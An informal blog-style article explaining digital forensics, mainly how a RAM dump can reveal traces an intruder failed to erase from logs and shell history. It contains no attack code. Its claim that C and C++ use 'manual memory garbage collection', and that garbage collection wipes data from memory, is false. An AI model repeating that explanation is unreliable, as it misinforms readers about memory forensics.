For people who watch television cop shows then there is a good chance that you have heard of the word forensics. Even if you do not know what it means exactly by watching the shows you probably have a good idea what it is. Well just like in the real world, the virtual world needs crimes solved as well. And just like on the TV shows, forensics is one way to be able to get it done.
As you well know, there are a lot of crimes that happen on the internet and they need some way to have them solved. And like I said in the previous paragraph, one way to solve the crime is through the use of forensics. But you might be asking yourself several questions based on what you have seen on TV. How can we use forensics on a computer and how do we do it online? Well that is what this article is here to talk about. I am here to show you how forensics works both in the digital world and on your physical computer as well. So let’s start to take a look at this world now.
How Forensics works on your computer
When you use your computer both online and off, there are certain trails that are left that you probably do not know about. To know all of the trails that are left on the computer itself you would have had to have studied computer architecture in some point in your life. Even if you work on the computer all of the time there is a good chance that you do not know everything that is going on underneath the hood. Even if you have a decent idea there is too much to know unless you study it. The same thing goes with online as well. The reason why cyber criminals are able to get away with a lot of the crimes that they do online is because they have studied networking at some point in their life. From there they are able to use what they know about networks to be able to manipulate it to hide their tracks.
When you are on the computer or if you are online and you need to find out what a criminal has done on the computer, you are going have to be able to find the areas that might show you clues. That is where digital forensics comes into play. Even though they may have been able to erase some of the traces that they left when they were floating on your computer, there is a chance that if you look deep enough that they didn’t erase it all. While most criminals that intrude on your computer will remember to erase any logs that might have been made during their visit, or any extra commands in the command line shell that might have been made on your computer or server, there is a good chance that unless they are real good that they forgot one thing.
There is a good chance that they forgot about the memory that is installed in the computer. As long as the computer is still plugged in and there has not been that much activity on the computer you might be able to mine the memory for clues of who has been on the computer or server. All data that is processed by the computer has to go through the memory first so that it can be picked up and sent to the L caches, then registers and then to the processor. So whatever the criminal had to do, there is a good chance that some of the data might be found in the memory. So a person could do a data dump of what is in RAM and see if there is any trace of the attacker. This is where the forensics comes into play.
The reason why they are able to do this is because some programming languages call a garbage collection algorithm to get rid of unused data on the memory while others do not. Most attackers use programs that do not get rid of their data. For example, C and C++ have manual memory garbage collection and if they do not call it then that part of the program stays in memory. If that happens then when you do the data dump there is a good chance that you might be able to find a clue.
But not all attacks used specialized programs that might have a hole and if the data gets overwritten then there is no chance to be able to run forensics on the memory. So while this method is a good one, it is not foolproof by any means.